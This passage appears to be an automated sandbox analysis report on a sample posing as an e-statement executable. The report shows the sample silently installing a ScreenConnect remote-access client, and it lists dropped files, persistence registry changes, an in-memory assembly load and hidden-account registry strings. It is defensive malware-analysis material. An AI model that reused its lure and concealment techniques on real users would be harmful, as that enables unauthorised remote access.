                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: certificate valid
                                  Source: estatement020134230003.exe.virus.exeStatic file information: File size 5620176 > 1048576
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2601854749.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1451563252.0000000012F30000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: estatement020134230003.exe.virus.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2587568699.0000000002831000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1444417476.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1444075114.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1444214059.0000000002EF2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1370838629.00000000008CD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: estatement020134230003.exe.virus.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1350076124.0000000004978000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1352579539.0000000004800000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1350076124.0000000004909000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: estatement020134230003.exe.virus.exe, 60e8b9.msi.3.dr, 60e8b7.msi.3.dr, 60e8b8.rbs.3.dr, MSIEACA.tmp.3.dr, MSIEAEA.tmp.3.dr, ScreenConnect.ClientSetup.msi.0.dr, MSIEDBA.tmp.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: estatement020134230003.exe.virus.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2601854749.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1451563252.0000000012F30000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1390035254.0000000000522000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: estatement020134230003.exe.virus.exe, 60e8b9.msi.3.dr, 60e8b7.msi.3.dr, MSIE1B2.tmp.2.dr, ScreenConnect.ClientSetup.msi.0.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1390035254.0000000000522000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1443805844.0000000002E72000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1443805844.0000000002E72000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2601854749.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1451563252.0000000012F30000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  barindex
                                  Source: 0.2.estatement020134230003.exe.virus.exe.2c50000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: real checksum: 0x54d1c1 should be: 0x55de92
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_013170B0 push eax; mov dword ptr [esp], ecx0_2_013170C1
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_05616460 pushfd ; retf 0_2_05616461
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_05613AD7 push ebx; retf 0_2_05613ADA
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_056349E0 push eax; mov dword ptr [esp], edx0_2_056349F4
                                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_04A2848D push es; ret 5_3_04A28490
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 8_2_060B4451 push esp; ret 8_2_060B4483
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CCB74EB push ebp; retf 9_2_00007FFE7CCB74EC
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CCB747E push esp; retf 9_2_00007FFE7CCB7480
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CCB00BD pushad ; iretd 9_2_00007FFE7CCB00C1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CCB79CF push ebp; retf 9_2_00007FFE7CCB79D0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CCB7412 push esp; retf 9_2_00007FFE7CCB7414
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CFC6459 push ecx; retf 9_2_00007FFE7CFC645A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CFC1C53 pushfd ; iretd 9_2_00007FFE7CFC1C54
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CFC6FD2 push edi; iretd 9_2_00007FFE7CFC6FD6
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CFC2160 push ecx; retf 9_2_00007FFE7CFC2167
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CFC399D push ecx; retf 9_2_00007FFE7CFC399F
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CFC20FF push ecx; retf 9_2_00007FFE7CFC2101
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CFC1B9A push eax; retf 9_2_00007FFE7CFC1B9B
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CFC4BBE pushfd ; ret 9_2_00007FFE7CFC4BC1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7CFC1BF6 push eax; retf 9_2_00007FFE7CFC1BF7
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CC900BD pushad ; iretd 11_2_00007FFE7CC900C1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CFA98AA push edi; retf 11_2_00007FFE7CFA9986
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CFA6145 push esp; retf 11_2_00007FFE7CFA6164
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CFA2D52 push ebx; retf 11_2_00007FFE7CFA2D54
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CFA21BC push ebx; retf 11_2_00007FFE7CFA21BD
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CFA55D1 push esp; iretd 11_2_00007FFE7CFA55D9
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CFA0609 push ebx; retf 11_2_00007FFE7CFA060A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CFA160D push ebx; retf 11_2_00007FFE7CFA160E
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CFA784B push ebx; retf 11_2_00007FFE7CFA7856
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CFA9C4B push cs; iretd 11_2_00007FFE7CFA9C4F
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFE7CFA2041 push ds; iretd 11_2_00007FFE7CFA2048

                                  Persistence and Installation Behavior

                                  barindex
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                                  Source: c:\program files (x86)\screenconnect client (8d1a70ac1b2b845c)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-8114-d4f9e6f7d40d}\inprocserver32
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEDBA.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEAEA.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEDBA.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEAEA.tmpJump to dropped file
                                  Source: ScreenConnect.ClientService.dll.3.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (8d1a70ac1b2b845c)Jump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1326278393.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1361697928.0000000005430000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: rundll32.exe, 00000005.00000003.1350076124.0000000004984000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2587568699.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1444417476.0000000002F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1444075114.0000000002EB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1462488017.000000001BE12000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1444214059.0000000002EF2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: estatement020134230003.exe.virus.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.5.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.ClientService.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
